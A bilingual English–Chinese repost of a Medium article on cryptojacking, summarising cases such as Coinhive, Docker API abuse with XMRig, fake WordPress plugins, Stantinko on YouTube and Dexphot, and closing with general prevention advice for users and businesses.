关押罪犯_网络罪犯越来越擅长加密您的设备

关押罪犯

Cyber criminals are cryptojacking your devices and stealing computing power to mine cryptocurrencies, and they are getting very good at it. It’s one of the major upcoming cyber crimes in recent years. These type of hackers are in search for computing power to run crypto mining software, most of the time Monero. They search for a security weakness, install some software and reap the rewards. This way they are using computing power from companies and common individuals to generate Monero. But how does it work exactly?

网络罪犯正在加密您的设备并窃取计算能力来开采加密货币，他们对此非常擅长。 这是近几年来即将发生的重大网络犯罪之一。 这些类型的黑客大部分时间都在寻找运行加密货币挖矿软件的计算能力。 他们寻找安全弱点，安装一些软件并获得回报。 这样，他们便利用公司和普通个人的计算能力来生成Monero。 但是它到底如何工作？

Cyber criminals that are cryptojacking aren’t super hackers, but they use existing vulnerabilities to their own benefit. Most of the time they use well known exploits and search for badly updated computers and servers. In other cases they hope that consumers are dumb enough to click on a link, or visit a certain website. It’s all about getting that little piece of software on the other computer and get it running.

进行加密劫持的网络罪犯不是超级黑客，但他们利用现有漏洞为自己谋利。 大多数时候，他们使用众所周知的漏洞利用并搜索更新较差的计算机和服务器。 在其他情况下，他们希望消费者愚蠢到可以点击链接或访问某个网站。 这是关于在另一台计算机上获取该小软件并使其运行的全部内容。

American internet security firm Bad Packets discovered ‘opportunistic mass scanning activity’ on Docker servers on November 26th. This is an example of typical cryptojacking activity. Most of the time hackers are just looking for a weakness in one of the APIs. As soon as a weakness is found, they start an Alpine Linux OS container. This software downloads and runs a script, and in addition that script will install XMRRig, which is basic mining software for Monero.

美国互联网安全公司Bad Packets于11月26日在Docker服务器上发现了 “机会性大规模扫描活动”。 这是典型的密码劫持活动的示例。 大多数时候，黑客只是在寻找其中一种API的弱点。 一旦发现漏洞，他们就会启动Alpine Linux OS容器。 该软件将下载并运行一个脚本，此外该脚本还将安装XMRRig，这是Monero的基本挖掘软件。

Coinhive是一位开国元勋 (Coinhive was a founding father)

Docker servers are enterprise solutions, and it’s not very likely that normal individuals use these at home. That doesn’t mean that you and I are safe though. Cryptojacking happens in all kinds of ways, and for the hackers it doesn’t matter whether they target commercial companies or individuals. Therefore it’s very important to be aware of the possibilities of cryptojacking.

Docker服务器是企业解决方案，普通人不太可能在家中使用它们。 但这并不意味着您和我安全。 加密劫持以各种方式发生，对于黑客而言，无论是以商业公司还是个人为目标都没有关系。 因此，了解加密劫持的可能性非常重要。

The whole hype about cryptojacking started with Coinhive. This website plugin would use the computing power of the website’s visitors to mine for Monero. The service launched in 2017 as a way for website owners to generate some money, but quickly became the center of internet drama.

关于加密劫持的整个炒作始于Coinhive。 该网站插件将利用网站访问者的计算能力来挖掘Monero。 该服务于2017年推出，作为网站所有者赚钱的一种方式，但很快成为互联网戏剧的中心。

Websites used the software without telling their visitors, which caused a first backlash. On top of that there — of course — hackers who installed the Javascript code into websites, without the original owners knowing about it. At its peak Coinhive was used for approximately 62 percent of all cryptojacking activity. Increased mining difficulty, blockchain forks, and the downturn of the crypto market, made them decide the cease operations in March 2019. That didn’t mean that cryptojacking would stop, but cyber criminals just got a lot more sophisticated.

网站在未告知访问者的情况下使用了该软件，这引起了第一React。 当然，最重要的是，黑客将Javascript代码安装到网站中，而原始所有者却不知道。 在最高峰时期，Coinhive被用于所有加密劫持活动的62％。 采矿难度的增加，区块链的分叉以及加密市场的低迷，使他们决定在2019年3月停止运营。这并不意味着加密劫持将停止，但是网络犯罪分子变得更加复杂。

更高级别的加密犯罪 (Next level crypto crime)

Installing a plugin on your website is a simple way to use computing resources from other people. Cryptojacking is on the rise and it’s not very likely to stop any time soon. In 2018 the amount of crypto-mining malware increased with 4467 percent. This number was obviously driven by Coinhive, but it wasn’t the only source. In the first quarter of 2019 the amount of ransomware attacks grew by 188 percent, while crypto mining grew another 29 percent.

在您的网站上安装插件是使用其他人的计算资源的简单方法。 加密劫持呈上升趋势，不太可能很快停止。 2018年，加密采矿恶意软件的数量增加了4467％。 这个数字显然是由Coinhive推动的，但是它不是唯一的来源。 在2019年第一季度，勒索软件攻击的数量增长了188％，而加密货币挖矿的数量又增长了29％。

A website security company reported in October 2019 that hackers were using vulnerabilities in old WordPress plugins. In addition they would create copies of popular plugins to trick users. When this plugin is installed, it runs an executable that gives the hackers access to the server. Even when the plugin is removed, the hacker still has access. As a result he can use the internet server to mine Monero. In similar fashion hackers are hiding code inside .WAV audio files, which is executed when the file is played.

一家网站安全公司在2019年10月报告说 ，黑客正在使用旧WordPress插件中的漏洞。 另外，他们会创建流行插件的副本来欺骗用户。 安装此插件后，它将运行一个可执行文件，使黑客可以访问服务器。 即使删除了插件，黑客仍然可以访问。 结果，他可以使用Internet服务器来挖掘Monero。 黑客以类似的方式将代码隐藏在.WAV音频文件中 ，该文件在播放文件时执行。

McAfee Labs reported that cyber crime is becoming a lot more sophisticated. Hackers are searching for vulnerabilities, and any internet device with computing power will do. Last year malware targeting Internet-of-Things (IoT) devices grew with 200 percent. These internet connected devices, like routers and IP cameras, don’t generate lots of mining power, but it’s volume that the hackers are after. Power is in the numbers.

McAfee Labs 报告说 ，网络犯罪正在变得更加复杂。 黑客正在寻找漏洞，任何具有计算能力的互联网设备都可以。 去年，针对物联网(IoT)设备的恶意软件增长了200％。 这些与互联网连接的设备(例如路由器和IP摄像机)不会产生大量的挖掘能力，但黑客所追求的却是巨大的数量。 力量在于数字。

数量众多 (Cryptojacking is in the numbers)

A Slovakian software security firm Eset has uncovered that cyber criminals behind the Statinko botnet are now deploying cryptocurrency mining software. To do this they target YouTube and its 2 billion monthly users. They upload videos that resonate well with certain audiences, and provide links to trigger people. Upon clicking, software can be installed on the viewer’s computer.

一家斯洛伐克软件安全公司Eset 发现 ，Statinko僵尸网络背后的网络罪犯现在正在部署加密货币挖掘软件。 为此，他们针对YouTube及其每月20亿用户。 他们上传的视频在某些受众中引起了共鸣，并提供了触发人们的链接。 单击后，可以在查看器的计算机上安装软件。

The hackers behind Statinko aim for users from Russia, Ukraine, Belarus and Kazakthstan. But by moving their criminal activity to YouTube, they could be looking for an expansion. According to Eset already 500 thousand devices have been infected by the mining software. Reportedly YouTube is already removing content and channels that contains traces of Statinko’s code. But it’s unlikely that Statinko will stop, and therefore it’s important for users not to click any links from unknown sources.

Statinko背后的黑客针对来自俄罗斯，乌克兰，白俄罗斯和哈萨克斯坦的用户。 但是，通过将他们的犯罪活动转移到YouTube，他们可能会寻求扩展。 根据Eset的说法，该挖矿软件已经感染了50万台设备。 据报道，YouTube已经删除了包含Statinko代码痕迹的内容和频道。 但是Statinko不太可能会停止，因此对于用户而言，不要单击来自未知来源的任何链接很重要。

下一代加密劫持恶意软件 (Next level cryptojacking malware)

They way the cyber criminals spread their cryptojacking malware on YouTube is similar to other hacking campaigns. It’s all about tricking the consumer into clicking and thereby activating certain software. However, sometimes things can get very complicated. On November 26th Microsoft reported on cryptojacking malware called Dexphot. This malware has infected 80 thousand computers worldwide since October 2018.

网络罪犯通过这种方式在YouTube上传播其加密劫持恶意软件的方式类似于其他黑客活动。 这一切都是为了诱使消费者点击并激活某些软件。 但是，有时候情况会变得非常复杂。 11月26日，Microsoft 报告了名为Dexphot的加密劫持恶意软件。 自2018年10月以来，该恶意软件已感染了全球8万台计算机。

If someone has XMRRig running on their computer, it’s quite easy to deactivate it. The Dexphot attack however, is much more sophisticated and would even reinstall itself when defenders try to remove the malware. The cryptojacking malware would use all kinds of tactics to evade security, using different entry points.

如果某人在其计算机上运行XMRRig，则很容易将其停用。 但是，Dexphot攻击要复杂得多，当防御者试图删除恶意软件时，它甚至会自行重新安装。 加密劫持恶意软件将使用各种策略来使用不同的入口点来规避安全性。

Dexphot even received regular updates. Underlining the ability to evolve over time into an ever changing threat. This is next level malware, and underlines how important it is to stay safe on the web.

Dexphot甚至收到定期更新。 强调了随着时间的推移演变为不断变化的威胁的能力。 这是下一级别的恶意软件，突显了确保网络安全的重要性。

如何防止加密劫持 (How to prevent cryptojacking)

Is your computer becoming slow, or is your processor working overtime? Sounds like your computer might be mining Monero for somebody. Perhaps it’s a good idea to install some quality internet security software. To prevent cryptojacking, live by these golden rules:

您的计算机速度变慢，还是处理器超时工作？ 听起来您的计算机可能正在为某人挖掘Monero。 安装一些高质量的互联网安全软件也许是个好主意。 为了防止加密劫持，请遵循以下黄金法则：

• Never click on shady links and websites.
  永远不要点击阴暗的链接和网站。
• Never open e-mails and its attachments from unknown sources.
  切勿打开来自未知来源的电子邮件及其附件。

• Install ad blocking browser extensions, or just use Brave.

  安装广告屏蔽浏览器扩展程序，或仅使用Brave 。

• Keep your software, browser extensions, and mobile apps up-to-date.
  使您的软件，浏览器扩展和移动应用程序保持最新。
• And if you run a business, keep your APIs closed, and educate your employees!
  而且，如果您经营企业，请关闭API，并教育您的员工！

Originally published at NEDEROB.

最初在 NEDEROB 发表 。

翻译自: https://medium.com/swlh/cyber-criminals-getting-good-at-cryptojacking-your-devices-62407fa5f6a0

关押罪犯